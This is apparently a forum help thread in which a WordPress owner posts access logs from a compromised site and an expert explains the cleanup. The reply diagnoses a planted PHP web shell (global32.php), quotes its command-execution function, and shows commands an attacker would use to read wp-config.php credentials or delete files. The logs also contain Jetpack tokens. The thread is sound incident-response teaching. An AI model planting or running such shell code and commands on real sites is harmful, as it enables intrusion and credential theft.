162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1&timestamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"

At the moment I have been going through and removing all the 'eval('s to get my site working again, but this is hardly a long term solution. Need some help getting this fixed.

Cheers,
Sebastian

3 Answers
jtittle1 February 14, 2017
Accepted Answer

@sebastiankade

There are a few plugins that you can enable to tighten up security -- such as Wordfence Security. A plugin, however, will only carry you so far.

There's a number of potentials, though one is happening now and that's attacks on the JSON API. If you're not using WordPress 4.7.2, you're vulnerable.

That said, if you've upgraded and there's still code that allows remote execution of code, even the security release update won't matter as you need to find the source of the attack.

Recommendations

What I would recommend doing is installing the Wordfence Security plugin and letting it perform an initial scan and see what pops up.

Also, this file seems to pop up quite often in the errors you're showing. Find out what it is and if it's not something you've setup, remove it.

/wp-content/themes/twentysixteen/css/global32.php

Additionally, check your directory permissions. If any directory is setup with a CHMOD of 777, fix it by changing it to 755.

To do this quickly, you can run something such as:

find /vavr/www/html -type d -exec chmod 755 {} \;

What the above command will do is recursively change all directories to a CHMOD of 755 from ./html and down.

You can do the same for files, which should be CHMOD 644.

find /vavr/www/html -type f -exec chmod 644 {} \;

Depending on how Apache is setup, this may prevent you from installing plugins or modifying files, though for the time being, that's not as much of an issue since we are in the process of trying to figure out where the attack is or is heading.

Are you keeping your server, your Wordpress and your plugins/themes up to date?

@sebastiankade

As an update, regarding the hack/breach, he's the details.

Hopefully my previous response was at least somewhat helpful. Taking a closer look at the base64 code that you provided, once decoded, it's actually a PHP/JS script that allows a remote attacker to essentially run any command that they wish.

It's not limited to basic commands such as getting a directory listing using ls or ls -al either. I ran a few tests on a throw away Droplet and it will allow an attacker to quickly and easily delete your files so this is something you need to handle quickly if there's anything that's of importance.

They are protecting the script with an MD5 hashed password in an attempt to keep it locked down. When successfully logged in you see a black screen and an input/output box. The input accepts any command and the output box shows the results of said command.

So other than creating and deleting files, what good does it do? Well, I did say any command, and that means shell commands.

The part of the script that handles this is this function:

function handle_cmd() {
    system($_POST['cmd']." 2>&1");
}

The above runs a provided shell command and silences the output.

Why does this matter?

Let's say this script is what the global32.php file is. If I'm the attacker and I login, I can see that my file is located at:

./wp-content/themes/twentysixteen/css/global32.php

So now in the code box of my script, I'll run:

cat ../../../../../wp-config.php

... and now I have your MySQL Database Credentials and I know what prefix you're using for your DB. That means that if further code is injected, the attacker can begin to work his/her way in to your DB and cause more havoc than just adding/tampering with files.

Equally as bad, an attacker could also simply run rm -rf and delete all files/directories in one fail swoop.

  • Thanks @jtittle I have installed Wordfence and running the scan helped me find and delete a whole bunch of these!

    It seems a little crazy that to simply have a Wordpress blog that doesn't get destroyed I have to have so many security "plugins" :D

    Thanks for your help.

    • @sebastiankade

      No problem at all, always happy to help!

      I know it seems a bit odd at first, though when you compare an application to a web server, you begin to see the similarities.

      Just as you wouldn't want to run a web server without a working firewall that's capable of deterring would-be attackers from attempting to connect to any port available, you really don't want to run an application without some sort of security measures in place.

      On the server side of things, you run a firewall, ensure proper permissions are set to your files and directories, make sure you're running as a non-privileged user when it comes to setting up your websites (i.e. root or a sudo user doesn't own your web directory or the files within it), disable root login via SSH and use a sudo user to login, etc.

      On the web, or public-facing side of things, you want to make sure you equally protected against threats. Wordfence is a good solution and will help you to reduce the number of successful attacks, though there's quite a bit more than can be done in regards to making sure this doesn't happen again. It can be time consuming, and this certainly isn't limited to just WordPress -- it applies to any web-facing property.

      That being said, I would highly recommend changing your WordPress Database details ASAP, once you're sure the attack is mitigated and cleaned up.

      If I was attacking your website, I'd definitely copy and paste those details first just in case I see an opening that allows me to connect remotely. By default, MySQL and MariaDB, on most installations, do not allow remote connections, though on some packages they do, thus if I had your credentials in hand and I see that I can login, I could do whatever I want to your database (i.e. posts, pages, etc). I could also inject new users that you may not notice and ultimately work towards gaining administrative privileges.

      A quick password reset once I have a user that's marked as an admin and I'm in.

      When it comes to attacks, assume the worst is possible and keep that in mind when you're cleaning up. Don't assume the attacker is ignorant or a script kiddy that just has way too much time on their hands and is bent on simply marking your site as a spam target. Make the assumption that what they are after is total control and with that mindset, make sure you change passwords and alter anything that would otherwise allow this to happen again.

Have another answer? Share your knowledge.